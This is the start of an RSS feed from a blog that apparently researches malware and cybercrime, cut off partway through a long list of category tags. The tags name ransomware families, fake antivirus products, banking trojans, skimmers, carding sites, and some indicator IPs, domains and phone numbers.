<?xml version='1.0' encoding='UTF-8'?><rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:openSearch="http://a9.com/-/spec/opensearchrss/1.0/" xmlns:blogger="http://schemas.google.com/blogger/2008" xmlns:georss="http://www.georss.org/georss" xmlns:gd="http://schemas.google.com/g/2005" xmlns:thr="http://purl.org/syndication/thread/1.0" version="2.0"><channel><atom:id>tag:blogger.com,1999:blog-5365964245877416061</atom:id><lastBuildDate>Sat, 07 Mar 2026 09:26:26 +0000</lastBuildDate><category>Ransomware</category><category>fakeav</category><category>Trojan.Ransom</category><category>rogue</category><category>winlock</category><category>homoblocker</category><category>screenshot</category><category>Affiliate</category><category>porn2o-rolik2.avi.exe</category><category>Carding</category><category>pornoplayer.exe</category><category>Trojan.Ransom (Lock Em All)</category><category>Trojan.Ransom (flash_player.exe)</category><category>phishing</category><category>card</category><category>Skimmer</category><category>Citadel</category><category>bestAV</category><category>Carder</category><category>Spam</category><category>Tracking Cyber Crime</category><category>skim</category><category>Hoax</category><category>NCR</category><category>ZeuS</category><category>lockscreen</category><category>Diebold</category><category>POS</category><category>Trojan.Ransom (HomoBlocker)</category><category>Wincor</category><category>blackhole</category><category>ransom</category><category>ArchSMS</category><category>MBR</category><category>SpyEye</category><category>HoaxSMS</category><category>Ransomlock</category><category>Trojan.MBRlock</category><category>asm</category><category>hackforum</category><category>pos malware</category><category>Hacked</category><category>Phish-BankFraud</category><category>SMSSend</category><category>Skimming</category><category>darkode</category><category>exploit kit</category><category>fake</category><category>paysafecard</category><category>ram scrapper</category><category>ukash</category><category>Carberp</category><category>Code</category><category>FakePoliceAlert</category><category>Pharma</category><category>Point Of Sale</category><category>RDP</category><category>Security Shield</category><category>Xylibox</category><category>locker</category><category>malware</category><category>stealer</category><category>track2</category><category>EDF</category><category>FakeInst</category><category>Paypal</category><category>Point-of-Sale</category><category>Security Tool</category><category>System Tool</category><category>Webinject</category><category>acid.david9 ransomlock</category><category>carding shop</category><category>ATM</category><category>Alina</category><category>Braviax</category><category>Cracking</category><category>Essential Cleaner</category><category>KeygenMe</category><category>Liberty Reserve</category><category>MS Removal Tool</category><category>Mystic Compressor</category><category>Panel</category><category>Severa</category><category>TR/Fraud</category><category>Trojan.Ransomware</category><category>Visa</category><category>WSO</category><category>XOR</category><category>Zaxar</category><category>blocker</category><category>leak</category><category>nano</category><category>policelock</category><category>spamming</category><category>A-Fast Antivirus rogue keygen</category><category>Android</category><category>Bezel</category><category>Blackhole Exploit Kit</category><category>Botnet</category><category>C&amp;C</category><category>Citadel 1.3.5.1</category><category>Exploit</category><category>IceIX</category><category>MAD</category><category>MasterCard</category><category>Private AV Checker</category><category>Removal Guide</category><category>Security Shield 2011</category><category>TDS</category><category>Total security 2009</category><category>Track2 grabber</category><category>Trojan.Ransom (flash_player.exe) 8903452262600 8-903-452-26-2600</category><category>banker</category><category>banking</category><category>crackme</category><category>dump</category><category>hack</category><category>happy new year</category><category>holograms</category><category>lame</category><category>lr</category><category>memory scrapper</category><category>off-sho.re</category><category>pay per install</category><category>pornoplayer</category><category>shop</category><category>sniffer</category><category>track2 scrapper</category><category>vb6</category><category>77.221.149.219</category><category>AES</category><category>ATS</category><category>Adslock</category><category>Advanced Virus Remover</category><category>Aldibot</category><category>Alureon</category><category>Amex</category><category>Andromeda</category><category>Antivirus 8</category><category>Antivirus AntiSpyware 2011</category><category>Antivirus Protection</category><category>Aquabox</category><category>Avast</category><category>BTC</category><category>Bluetrash</category><category>C1F20D2340B519056A7D89B7DF4B0FFF</category><category>CAF</category><category>CC</category><category>Canada</category><category>Cheque</category><category>Citab</category><category>Cold$eal</category><category>Credit Cards</category><category>Cycbot</category><category>DK</category><category>Delphi</category><category>Dexter</category><category>Dorifel</category><category>ExManoize</category><category>Fake MSE Alert</category><category>Fake.HDD</category><category>Filecoder</category><category>FindWindowA</category><category>Gribodemon</category><category>HF</category><category>Internet Security 2010</category><category>Interview</category><category>Java Drive-By</category><category>Java.SMSSend</category><category>Keygenning</category><category>LOL</category><category>LR Curl scam script</category><category>Lamer</category><category>Lamers</category><category>Lock Em All</category><category>MISC</category><category>MITB</category><category>Mailien</category><category>Malware Protection</category><category>Malwox</category><category>Mayachok</category><category>Money laundering</category><category>NRB</category><category>Opera</category><category>POSCardStealer</category><category>Paunch</category><category>Personal Shield Pro</category><category>Phoenix Exploit Kit</category><category>Plastic service</category><category>Power Loader</category><category>PowerLoader</category><category>RAT</category><category>Raspberry Pi</category><category>Replica</category><category>Rogue-Security-Product-As-A-Service</category><category>Rovnix</category><category>SMS</category><category>SUTRA</category><category>Scam</category><category>Security essentials 2010</category><category>Security essentials 2011</category><category>Silence Winlocker</category><category>Skimmers</category><category>Smart Protection 2012</category><category>Smoke Loader</category><category>Spambot</category><category>Spyware Protection</category><category>System Security</category><category>Track2 malware</category><category>Trojan-Ransom.Win32.Xorist</category><category>Trojan.Ransom BKA Ransomware</category><category>TrojanRansom.Xorist</category><category>VAN32</category><category>VPN</category><category>VirtualProtectEx</category><category>W32.Xorist</category><category>Windows Scan</category><category>WriteProcessMemory</category><category>XSS</category><category>Xorist.c</category><category>Zenk-Security</category><category>assembler</category><category>assembly</category><category>av checker</category><category>backdoor</category><category>bank</category><category>base64</category><category>bitcoin</category><category>black processor</category><category>book</category><category>carders</category><category>ccshop</category><category>compromised</category><category>credit card</category><category>defrager</category><category>dice</category><category>driving license</category><category>dumps</category><category>eBay</category><category>facebook</category><category>fail</category><category>fake documents</category><category>flash</category><category>formgrabber</category><category>fraud</category><category>greenround</category><category>hash</category><category>java rhino</category><category>keygen</category><category>keylogger</category><category>lampeduza</category><category>linux</category><category>mafi</category><category>nano wincor</category><category>owned</category><category>pharming</category><category>phish</category><category>php</category><category>plastic</category><category>processing service</category><category>security tool rogue</category><category>spammer</category><category>track 2</category><category>track 2 grabber</category><category>track1</category><category>video</category><category>winlocker</category><category>zip-archive.com</category><category>скиммер</category><category>(xxxvideo.avi.exe)</category><category>+16464816878</category><category>.NET</category><category>0012140809940</category><category>0973467457475070215340537432225</category><category>1-866-286-6162</category><category>1.0.0.2</category><category>1.0.0.5</category><category>100 euro</category><category>10293838</category><category>142.4.105.98</category><category>142.4.105.99</category><category>15-Minut</category><category>184.107.77.70</category><category>184.22.103.202</category><category>184.82.162.163</category><category>200 euro</category><category>2012</category><category>204.188.221.238</category><category>24-tabs.ru</category><category>24hourdrugsource.com</category><category>27C3</category><category>2in1pill.com</category><category>365pills</category><category>3D Models</category><category>3D Skimmer</category><category>3c09a47b4a673a9e46cb0de70b02454d</category><category>3d</category><category>4093245501</category><category>410011066189985</category><category>423 877 0158</category><category>4B</category><category>50</category><category>50 euro</category><category>500 Eur</category><category>500 euro</category><category>5919019953695</category><category>64.32.10.171</category><category>64.85.233.8</category><category>7*108#</category><category>7304461.exe</category><category>7xTUBE</category><category>7xVideo</category><category>7xVideo D1</category><category>7xVideo WG1</category><category>8 (906) 096-4547</category><category>89060964547</category><category>89261072166</category><category>89653751844</category><category>911-013-30-35</category><category>988-185-37-42</category><category>A &quot;Loader&quot; Case</category><category>AES cryptovirus GpCode 2011 GPcoder.j RSA-1024 Troj/Ransom-U TROJ_RANSOM.EWQ Trojan.Gpcoder.G Trojan:Win32/Ransom.BQ Ransomware</category><category>AES cryptovirus GpCode 2011 GPcoder.j RSA-1024 Troj/Ransom-U TROJ_RANSOM.EWQ Trojan.Gpcoder.G Trojan:Win32/Ransom.BQ Ransomware Trojan-Ransom.Win32.Gpcode.bn</category><category>AKM Antivirus 2010 Pro</category><category>ANDI RAZVAN SIMION</category><category>ATSEngine</category><category>AV</category><category>AV Guard Online</category><category>AV Protection Online</category><category>AV Security 2012</category><category>AV Security Essentials</category><category>AV-AFF.BIZ</category><category>AVG Anti-Virus</category><category>AVG Antivirus</category><category>AWM Antivirus</category><category>Ac1db1tch3z</category><category>AccPhish</category><category>Acid Drop 1.5</category><category>Acid-Alchemy</category><category>Adobe</category><category>Adslock.A</category><category>Adult</category><category>Advanced PC Shield 2012</category><category>Advanced Security Tool 2010 Security Central Home Personal Antivirus XP Deluxe Protector Win PC Antivirus Win PC Defender XP Police Antivirus IE-Security WinDefender 2009 and Total Secure 2009 rogue</category><category>Adware</category><category>AffPrime</category><category>Affiliates</category><category>AlphaPack</category><category>Alueron</category><category>American Express</category><category>Amnesia</category><category>Android.Spitmo</category><category>Android.Trojan.Rubobi.A</category><category>Android/FakeToken.A</category><category>AnonJDB</category><category>Another cc-grabbers admin panel</category><category>Antimalware Doctor</category><category>Antimalware PC Safety</category><category>Antimalware Tool</category><category>Antivir 2010</category><category>Antivir Solution Pro AV Security Suite AntiSpyware Soft Antivirus Suite Antivirus Soft clone Rogue</category><category>Antivirii 2011</category><category>Antivirus 2011</category><category>Antivirus 7</category><category>Antivirus Clean 2011</category><category>Antivirus GT</category><category>Antivirus Smart Protection</category><category>Antivirus System</category><category>Antivirus7 Antivirus8</category><category>April fool</category><category>Arizona</category><category>Asus</category><category>Atmos</category><category>Atrax</category><category>Atrax Botnet</category><category>Audio Skimmer</category><category>Autodesk Inventor Fusion 2013</category><category>Avast-antivirus-francais.exe</category><category>Avast.exe</category><category>Avira</category><category>B208016071489</category><category>BAT.KillFiles</category><category>BBAC</category><category>BH</category><category>BR300</category><category>BRASOV (Romania)</category><category>BSR</category><category>BackDoor-ARD</category><category>BackDoor.Feardoor</category><category>Backdoor.Citadel.BkCnct</category><category>Backdoor.IRC</category><category>Backdoor.Nucleroot</category><category>Badge</category><category>Bank Accounts</category><category>Bank Of America</category><category>Bar Code Slot Reader</category><category>Barcode</category><category>Barracuda Loader</category><category>Bc5rw12</category><category>Beats by dr.dre</category><category>Best Virus Protection</category><category>BestSoft</category><category>Betabot</category><category>Betabot 1.0.2.5</category><category>Betabot 1.5.0.0</category><category>Betabot 1.7.0.1</category><category>Billing</category><category>Biran Krebs</category><category>BitDefender Antivirus Pro 2011</category><category>BitDefender_Antivirus_Pro_2011.exe</category><category>Black Software</category><category>Black processing service</category><category>BlackPOS</category><category>BlackSofware</category><category>Blackhole 2.0</category><category>Blackhole exploit kit v1.1.0</category><category>Blackhole exploit kit v1.2.0</category><category>Blackhole v1.2.1</category><category>BlueFlare Antivirus</category><category>Bombacash</category><category>Books Sellers</category><category>Brainfuck</category><category>Brand Name Soft</category><category>Brand Software</category><category>Browser SMS Hoax</category><category>BruteForce.WP</category><category>Buy Cheap OEM</category><category>C+</category><category>C++</category><category>CC-Dealer</category><category>CCC</category><category>CMC</category><category>CN1</category><category>CNC</category><category>CRC32</category><category>CVE-2010-1885</category><category>CVE-2011-3544</category><category>Caixa Penedès</category><category>California</category><category>Camera box</category><category>Campaign</category><category>Canal plus</category><category>Canal+</category><category>Capital One</category><category>Captain Barbarossa</category><category>Carberp C&amp;C</category><category>Card Recon</category><category>Card reader</category><category>Carding manager</category><category>CardingStuff</category><category>Cardingmaster.com</category><category>Carpwned</category><category>Carrefour</category><category>Cash-trapping</category><category>CashPartners</category><category>CatTrade</category><category>CenterCash</category><category>Centurion</category><category>Chameleon rogue</category><category>Chase Freedom</category><category>Chase Sapphire</category><category>Chrome</category><category>Cidox</category><category>CigIncome</category><category>Cigarettes</category><category>Citadel 0.0.1.1</category><category>Citadel 1.3.5.1 Builder</category><category>Citadel 1.3.5.1 Remote Code Execution</category><category>Citadel 101</category><category>Citadel Hardware ID</category><category>Citadel Key</category><category>Citadel Lawsuit</category><category>Citadel Rain Edition</category><category>Citadel leak</category><category>Citi Black</category><category>Citi Platinum</category><category>Citi Shell</category><category>CleanThis</category><category>ClearLock</category><category>Clicker</category><category>Cloud Protection</category><category>Cocain</category><category>Code Cave</category><category>Coguar</category><category>Compressor</category><category>Computer is blocked</category><category>Consuella</category><category>Contemporary Profiling of Web Users</category><category>Contracts killing</category><category>Cookies Money</category><category>Coreguard Defense Center Protection Center Data Protection Digital Protection Your Protection User Protection Dr. Guard Paladin Antivirus AnVi Rogue</category><category>Counterfeit banknotes</category><category>Cracking Citadel</category><category>Cracking SpyEye 1.3.x</category><category>Creating a online Ransomware unlocker</category><category>Crimepack</category><category>CryptoService</category><category>Cryptorbit</category><category>Cuckoo</category><category>Curl</category><category>Curl Scam script</category><category>Cyberbunker</category><category>Cythosia</category><category>DDoS</category><category>DSC0912637.scr a194e793d739fb40b217b5775a6c7250 BR malware</category><category>DUMP MEMORY GRABBER v2.2 B1T moded by Ree4</category><category>Dahou</category><category>Damballa</category><category>DarkCoderSc</category><category>Darkcomet</category><category>Darkcomet RAT</category><category>Debug</category><category>Decoding Security Shield Fake scanner page</category><category>Deep Web</category><category>DelFiles</category><category>Demystifying</category><category>Diebold Agilis</category><category>Diebold Skimmers</category><category>Digital Store</category><category>Disk Antivirus Professional</category><category>Disk Optimizer</category><category>Disk Recovery</category><category>Disker</category><category>Django</category><category>Dorkbot.A</category><category>Dove</category><category>Download binaries</category><category>Dr. Max Kilger</category><category>Dr.Web</category><category>Drop service</category><category>Drugstore</category><category>Dump memory grabber</category><category>E-Set Antivirus 2011</category><category>EMV User and Programmer Guide</category><category>EURO Winlocker</category><category>Eee pc</category><category>Egypack</category><category>Element Scanner</category><category>Eleonore</category><category>Eleonore Exploits pack v1.2</category><category>Elgamal</category><category>Eligius</category><category>Elite VPN Service</category><category>Embosser</category><category>Embossing</category><category>Encoder Builder v2.31</category><category>Encryption virus</category><category>Epubb</category><category>EroDerevo</category><category>EsSandRe crackme</category><category>Euro banknotes</category><category>EvaPharmacy</category><category>EyeStye.plugin</category><category>FLASH10.exe</category><category>FTP</category><category>FUD</category><category>Fags</category><category>Fake AVG Anti-Virus</category><category>Fake BitDefender 2011</category><category>Fake Cheque</category><category>Fake E-Set Antivirus 2011</category><category>Fake Installer</category><category>Fake Kaspersky</category><category>Fake Site</category><category>Fake Windows Activation</category><category>Fake euros</category><category>Fake installers</category><category>Fake scanner page</category><category>Fake scanner source code</category><category>Fake.HDD Master Utilities</category><category>FakeAV Affiliate</category><category>FakeAV Business</category><category>FakeAV GUI</category><category>FakeAV Site</category><category>FakeHDD</category><category>Fakealerts</category><category>Fareit</category><category>Farewell</category><category>Fast Disk</category><category>Faton</category><category>Fear Client 1.5</category><category>FeodalCash</category><category>FeodalCash FeodalCash.ru</category><category>File Secure 2.1</category><category>Firefox</category><category>Firefox_update.exe</category><category>Five Hundred Euro</category><category>Flash Player</category><category>Florida</category><category>Fragus</category><category>Fragus Exploit Kit</category><category>France</category><category>French National ID</category><category>FreshDB</category><category>Freshdb.in</category><category>FuLLz</category><category>Fynloski.A</category><category>GCodeRogue</category><category>GDI</category><category>GEMA</category><category>GPcoder.j</category><category>GSM</category><category>GTA2</category><category>Gagarincash</category><category>Game</category><category>Gendarmerie Nationale</category><category>Georgia</category><category>Gigabid</category><category>Gimemo</category><category>Gold Installs</category><category>Good Memory</category><category>GpCode</category><category>GpCode 2010</category><category>GrandHost</category><category>Green Anti</category><category>Green NCR</category><category>Gregory Carpenter</category><category>GroundLabs.Card.Recon.v1.14.7-Lz0</category><category>Guard Online</category><category>Guardia di Finanza</category><category>Guilloche</category><category>HC Stealer</category><category>HDD Defragmenter System Defragmenter rogue</category><category>HDD Doctor</category><category>HO HO HO</category><category>HSBC</category><category>HSBC Business</category><category>HSBC France</category><category>HSBC Platinum</category><category>HTTP</category><category>Hack.lu 2k10 CTF &quot;Pirates crackme&quot; write-up Zenk-Security</category><category>Hack.lu CTF Beer challenge</category><category>Hackerzvoice</category><category>Hacktool.Citadel.Builder</category><category>HadèsKey</category><category>Hard Drive crash</category><category>Hardware ID</category><category>Harm.Win32.FakeMbr.a</category><category>Hash collision</category><category>Herbals</category><category>Hermes</category><category>Herpes</category><category>Hexing</category><category>Hitman</category><category>Hoax SMS</category><category>Holy shit a new post!</category><category>Home Safety Essential</category><category>Home Security Solutions</category><category>Honeynet Project</category><category>Hot Stamping</category><category>How to debug MBR Ransomware</category><category>How to hex a malware and make a builder</category><category>How to submit a sample to antivirus companies</category><category>Hyperlisk</category><category>ID Cards</category><category>IDA Pro</category><category>ISFB</category><category>Ice9</category><category>Iframe</category><category>IframeShop.net</category><category>Iframer</category><category>Illinois</category><category>Infostealer.Dexter</category><category>Inside the FakeAV Business</category><category>Install_Flash-Player.exe</category><category>Internet Explorer</category><category>Internet Explorer Emergency Mode</category><category>Internet Security 2011 rogue</category><category>Internet Security 2012</category><category>Internet Security Guard</category><category>Introduction au cracking sous Linux</category><category>Italian</category><category>J.P.MORGAN</category><category>Jade Jones</category><category>Japan</category><category>Java Atomic</category><category>Je T&#39;aime</category><category>John Doe 25</category><category>Jolly Roger Stealer</category><category>Joomla</category><category>KEYGENiNG FooMe 1 With Xylitol</category><category>KINS</category><category>Kawaii Security</category><category>Keitaro</category><category>Kentucky</category><category>KeyGenMe for Newbies :: Progressive KeygenMe #1</category><category>Keygenning4newbies CrackMe 1 coded by tHE ANALYST</category><category>Kit</category><category>Knucker.C</category><category>LOLKit</category><category>Lame winlock</category><category>Last and final post for me about darkode</category><category>LinkedIn Spam</category><category>Linux kernel exploit</category><category>Live Security Platinum</category><category>Lizamoon variante</category><category>Loader service</category><category>Lock Em All variante</category><category>LockDesigner</category><category>Log parser</category><category>Logs parser</category><category>Louisiana</category><category>LoveLetter</category><category>LuTiN NoIR Small RSA keygenme for newbies</category><category>Luo Yun Bin</category><category>Lux Cash</category><category>Luxury Cash</category><category>MAD 1.7</category><category>MBRLocker Builder v0.1</category><category>MC Logo</category><category>MCIR</category><category>MD5</category><category>MF</category><category>MP-FormGrabber</category><category>Mac OS X</category><category>MacBook Pro</category><category>Mail extractor</category><category>Mailling</category><category>Maine</category><category>Make users</category><category>Mal/DllHook-A</category><category>Malware Auto-downloader</category><category>Malware Auto-downloader v1.3b xylibox</category><category>Malware Auto-downloader v1.4 xylibox</category><category>Malware Auto-downloader v1.5 xylibox</category><category>Malware Auto-downloader v1.6</category><category>Malware Auto-downloader v1.7</category><category>Malware Auto-downloader v1.7 Revision 3</category><category>Malware Destructor 2011</category><category>Malware Protection Center</category><category>Malwarebytes&#39; Anti-Malware</category><category>Man in the browser</category><category>Maryland</category><category>Maza</category><category>Mazafaka</category><category>Mcafee</category><category>Meeting</category><category>MemScan:Trojan.KillMBR.S</category><category>Memory Optimizer</category><category>Merry christmas</category><category>Michigan</category><category>Milestone Antivirus</category><category>Millenium-Servers</category><category>Mississippi</category><category>Mobile</category><category>Moneris</category><category>Money Racing AV</category><category>MoneyPak</category><category>Moneycould</category><category>Multi Locker</category><category>Multi Locker 3</category><category>Multi-platform</category><category>Multirogue</category><category>Multirogue Defender</category><category>MyFullz</category><category>MyReplica.ru</category><category>Mystic</category><category>NCR Camera</category><category>NCR Green</category><category>NCR Round</category><category>NCR SelfServ</category><category>NETSKY Project</category><category>Nano NCR</category><category>Napal Rogue Builder</category><category>Napalm Rogue Builder</category><category>Napolar</category><category>NetWire</category><category>Netherlands</category><category>Neuromodel</category><category>Neutrino bot</category><category>New Jersey</category><category>Nigerian</category><category>Nocturne V4</category><category>Norton</category><category>Nuclear Exploit Pack</category><category>OEM</category><category>OEM Software</category><category>OTP forwarder</category><category>Oakley</category><category>Oficla</category><category>Ohio</category><category>OpenCloud Antivirus</category><category>Opteva</category><category>Orange</category><category>OrgiGuru</category><category>Other Equipment Manufacturer</category><category>PC Defender Plus</category><category>PC Defender antivirus rogue</category><category>PEcompact2</category><category>POS Grabber</category><category>POS System</category><category>PP</category><category>PPC</category><category>PPI</category><category>PPS</category><category>PVC ID Credit Card Embossing  machine</category><category>Palladium Pro</category><category>Panel for NCR</category><category>Parental Lock</category><category>Pay For Install</category><category>Paypal shop</category><category>Peax</category><category>Perkel</category><category>Perkele</category><category>Peru</category><category>Petroleum</category><category>PharmIncome</category><category>Phase</category><category>Phishing kit</category><category>Phoenix</category><category>Phoenix Exploit Kit 3.1</category><category>Phone</category><category>Picebot</category><category>Pikboclick.A</category><category>Plastics</category><category>Playstation</category><category>Please bitchz i&#39;m fabulous</category><category>Pony</category><category>Pony 1.9</category><category>Power Loader 2.0</category><category>PowerZeus</category><category>Poxter</category><category>Pr1v37*Fr0m*Be10Ru551a</category><category>Privacy Protection</category><category>PrivatCoin</category><category>ProfitBins.ru</category><category>PvE</category><category>PvP</category><category>QuickBasic</category><category>QunneD</category><category>R3000</category><category>RBN Encryptor Software</category><category>RCE</category><category>RSA</category><category>RSA javascript</category><category>RSA-1024</category><category>Rain Edition</category><category>Ranbyus</category><category>RansomHelper 1.0 / Malware Auto-downloader</category><category>Ransomware Targeting Americans</category><category>Ransomware who XOR your file</category><category>Rançongiciel</category><category>Ready to Ride v3</category><category>ReliaHost</category><category>Remote Code Execution</category><category>Replica Watches</category><category>Rev0Lt</category><category>Reverse Deception</category><category>Reverse Deception: Organized Cyber Threat Counter-Exploitation</category><category>Reveton</category><category>Review of the SpyEye Toolkit v1.3.45</category><category>Ripped</category><category>RogueAV</category><category>Rome0</category><category>Round NCR</category><category>Rovnix.D</category><category>RëFF</category><category>SEO</category><category>SFR</category><category>SIB Service</category><category>SKY-Loader</category><category>SKY-Loader v.1.2</category><category>SMTP</category><category>SSH</category><category>SSL</category><category>STR. DACIA 73</category><category>SUTRA TDS</category><category>SW</category><category>Sadok</category><category>Sakura Exploit Pack 1.0</category><category>Sakura exploit kit</category><category>Sales</category><category>Salt</category><category>Samsung Galaxy S</category><category>Santander</category><category>Satan 1.5</category><category>Scareware</category><category>Sean Bodmer</category><category>Security Center</category><category>Security Defender</category><category>Security Essentials Ultimate Pack</category><category>Security Guard 2012</category><category>Security Monitor 2012</category><category>Security Protection</category><category>Security Scanner</category><category>Security Shield Pro 2011</category><category>Security Solution 2011</category><category>Security Sphere 2012</category><category>Security essentials 2011 Security essentials 2010 Internet Security 2010 Advanced Virus Remover</category><category>Seftad</category><category>Serenity Exploit Kit</category><category>Serenity Scanner</category><category>Sergio</category><category>Serial killers</category><category>SexDerevo</category><category>Shell</category><category>Sigpanel UV</category><category>Silence</category><category>Simda.A</category><category>Sirefef</category><category>Slavik</category><category>Smart Anti-Malware Protection</category><category>Smart Fortress 2012</category><category>Smoke Bot</category><category>SmsPiratBot</category><category>Social engineering</category><category>Soft Store</category><category>SoftBunker</category><category>Software Sellers</category><category>Solar</category><category>Solaris</category><category>Solution</category><category>Sophos</category><category>Source</category><category>SpamHaus</category><category>Spamming shop</category><category>Spanish Version</category><category>SparkyJava</category><category>Spit Fyre</category><category>Spitmo</category><category>SpyEye 1.3.41</category><category>SpyEye 1.3.45</category><category>SpyEye 1.3.48</category><category>SpyEye Builder v1.1.39</category><category>SpyEye Builder v1.1.39 (Botnet cracking session)</category><category>SpyEye Builder v1.2.50 (Botnet cracking session)</category><category>SpyEye Builder v1.2.60</category><category>SpyEye v1.1.39 unpacked</category><category>SpyEye v1.2.99 lame</category><category>SpyEye v1.3</category><category>SpyEye v1.3 interface</category><category>SpyEye v1.3.39</category><category>SpyEye v1.3.x</category><category>SpyEye variant</category><category>Spyware Protection Remover</category><category>Squirrel Mail</category><category>StarDust</category><category>Steam</category><category>Steganography</category><category>Stimul Premium</category><category>StopHaus</category><category>StreamTorrent</category><category>SunWatches.ru</category><category>Super AV</category><category>Surething Team</category><category>Sysinternals Antivirus</category><category>Sysinternals Antivirus XJR Antivirus AKM Antivirus 2010 Pro Your PC Protector Wireshark Antivirus rogue</category><category>System Antivirus Microsoft 2011</category><category>System Care Antivirus</category><category>System Check</category><category>System Fix</category><category>System Security 2011</category><category>System Security rogue</category><category>System doctor 2014</category><category>System plugin at address 0x00874324 got critical error</category><category>System plugin at address 0x3BC3 got critical error</category><category>TD Green</category><category>TD World</category><category>TOR</category><category>TOR Botnet</category><category>TOWPOW</category><category>TROJ_RANSOM.EWQ</category><category>Tarcloin</category><category>Tatanga</category><category>TeamkNast</category><category>Tennesseen</category><category>ThePefectTime.ru</category><category>ThinkPoint</category><category>Three Elephant</category><category>Tiberium drop service</category><category>Tick Panel</category><category>ToXiiC</category><category>Tobfy</category><category>Tobfy.M</category><category>TokenSpy</category><category>Toni</category><category>Tonijuve007</category><category>Tonix</category><category>Total Protect</category><category>TotalProtect</category><category>Tracking Cyber Crime: AV-AFF.BIZ</category><category>Tracking Cyber Crime: BestAV and BlackSofware *Reloaded*</category><category>Tracking Cyber Crime: Golden Ducat</category><category>Tracking Cyber Crime: Ready to Ride v3 (Win32/Cycbot Affiliate)</category><category>Tracking Cyber Crime: Virtest and Palevo (Private AV Checker) pwned</category><category>Tracking Cyber Crime: WinAD gang (Ransom.DN/Win32.Timer) Traffic Distribution System</category><category>Tracking Cyber Crime: Zip Archive Affiliate (Hoax SMS/Fake Installer)</category><category>Traffic Distribution System</category><category>Travelers Cheque</category><category>Tritax</category><category>Troj/Ransom-U</category><category>Troj/Skimer-A</category><category>Troj/WowSpy-A</category><category>Trojan.Clicker</category><category>Trojan.FakeAV.LVT</category><category>Trojan.Gpcoder.G</category><category>Trojan.HDDKill.517</category><category>Trojan.Kardphisher</category><category>Trojan.KillFiles</category><category>Trojan.KillMBR.ap</category><category>Trojan.Ransom (Pornoblocker)</category><category>Trojan.Ransom (bioritm.exe)</category><category>Trojan.Ransom (flash_player.exe variant)</category><category>Trojan.Ransom (flashplayer.exe)</category><category>Trojan.Ransom (porno-rolik.avi.exe)</category><category>Trojan.Ransom (userinit.exe)</category><category>Trojan.Ransom (virussign.exe)</category><category>Trojan.Ransom Fake Metropolitan Police</category><category>Trojan.Ransom Microsoft Security Antivirus</category><category>Trojan.Ransom.Boot</category><category>Trojan.Ransom: La policía ESPAÑOLA</category><category>Trojan.Ransomware keygen</category><category>Trojan.Siggen5.64266</category><category>Trojan.WPCracker.1</category><category>Trojan.Win32.KillMBR</category><category>Trojan.Win32.KillMBR.aw</category><category>Trojan:Win32/Ransom.BQ</category><category>Trojan:Win32/Tobfy.M</category><category>True Big Cash</category><category>Trusteer-Mobile.apk</category><category>Turing</category><category>U157727070520</category><category>U235459552163</category><category>U264040669509</category><category>U2909099</category><category>UFDC</category><category>USA</category><category>USBank Paywave</category><category>USPS</category><category>UV</category><category>Ulocker</category><category>Umbra loader</category><category>Umbrella</category><category>Uniq pack</category><category>Université Française de Cracking</category><category>Unknown</category><category>Unxoring TR.Ransom.Xorist</category><category>VB6 VirusTotal Mass rating tool</category><category>VBS</category><category>VMware</category><category>VPS</category><category>Vampire.Vn</category><category>Vendigo</category><category>Versand</category><category>VertexNet v1.1.1 Loader</category><category>Vertu</category><category>Vertu Cash</category><category>VertuCash</category><category>Video Grabber</category><category>Virtualization</category><category>VirusKeeper</category><category>VirusTotal</category><category>Vulnerabilities</category><category>W32/PixSteal.A</category><category>WPCracker.1</category><category>WU</category><category>Wallet</category><category>WapSyst</category><category>Washington</category><category>Watch4.ru</category><category>WaterEffect</category><category>WaveASM</category><category>Wayback Machine</category><category>Web RAT</category><category>Weed</category><category>Weird ransomware</category><category>Western Union</category><category>Win32.Adware</category><category>Win32.Buzus</category><category>Win32.StartPage</category><category>Win32.Umbald.A</category><category>Win32/Atrax.A</category><category>Win32/Kelihos.B</category><category>Win32/Spy.POSCardStealer.O</category><category>Win32:KillMBR-D</category><category>WinDisk</category><category>WinLocker Builder v0.2 Cracking Generated winlocks</category><category>WinLocker Builder v0.4 Cracking Generated winlocks</category><category>WinRAR</category><category>WinRAR 2011</category><category>WinRARc</category><category>WinScan</category><category>Windows</category><category>Windows Disk</category><category>Windows Oversight Center</category><category>Windows Problems Protector</category><category>Windows Software Protection</category><category>Windows Threats Destroyer</category><category>Windows XP Recovery EDS</category><category>Windows XP Restore</category><category>Windows license locked</category><category>WindowsTool</category><category>WindowsWebSecurity.exe</category><category>Winlock Affiliate</category><category>Winlock Builder [Private] v1.30</category><category>Winlocker builder</category><category>Wireshark Antivirus</category><category>Wisconsin</category><category>Wizard Mobile</category><category>Wolfram Antivirus</category><category>World Of Warcraft</category><category>X45976</category><category>XAT Loader</category><category>XJR Antivirus</category><category>XP Anti-Spyware 2011</category><category>XP Anti-Virus 2011</category><category>XP Home Security 2011</category><category>XP Internet Security 2011</category><category>XP Total Security 2011</category><category>XSSed</category><category>XTC</category><category>Xc0d3r</category><category>Xylibox Malware Challenge 2# -  Solved</category><category>Xylitol</category><category>Xylitol is powerful</category><category>Yamba network</category><category>Yambo Financials</category><category>You can run but you can&#39;t hide</category><category>Your PC Protector</category><category>Your Windows has been blocked</category><category>Your computer&#39;s file system has encountered a serious error. Please restart the computer or call support at 1-866-286-6162</category><category>Z66049981965</category><category>Zbot</category><category>Zentom System Guard</category><category>Zeus 1.1.2.1</category><category>Zeus 1.1.3.4</category><category>Zeus 2.9.6.1</category><category>Zeus Red</category><category>Zeus v2</category><category>ZeusAES</category><category>ZeusVM</category><category>Zip-Wap</category><category>ZipArchive</category><category>ZwResumeThread</category><category>accident</category><category>adminshop2013.com</category><category>alexudakov</category><category>algorithm implementation</category><category>alina source code</category><category>all your base are belong to us</category><category>allocated memory</category><category>and many craps</category><category>asm.yeah.net</category><category>av scanner</category><category>avastfrance.com</category><category>back soon</category><category>back-end</category><category>badbase.ru</category><category>bastard.su</category><category>bdrop</category><category>beats pro</category><category>bestavsoft2</category><category>beware of fake banking applications</category><category>bhstat</category><category>bill</category><category>bin list</category><category>bl4kj.zapto.org</category><category>blacksoftware.cc</category><category>blackwire</category><category>blank card</category><category>blocked</category><category>blog news</category><category>booksnetdownloads.com</category><category>booter</category><category>bosi.su</category><category>botnet phone</category><category>bp</category><category>bruteforce</category><category>builder</category><category>bulk</category><category>bulletproof</category><category>bundespolizei</category><category>bx1</category><category>c99</category><category>cPanel bruteforcer</category><category>candytrip</category><category>car documents</category><category>card shop</category><category>cards</category><category>cardsmarket.su</category><category>carp shop</category><category>cash trap</category><category>cc 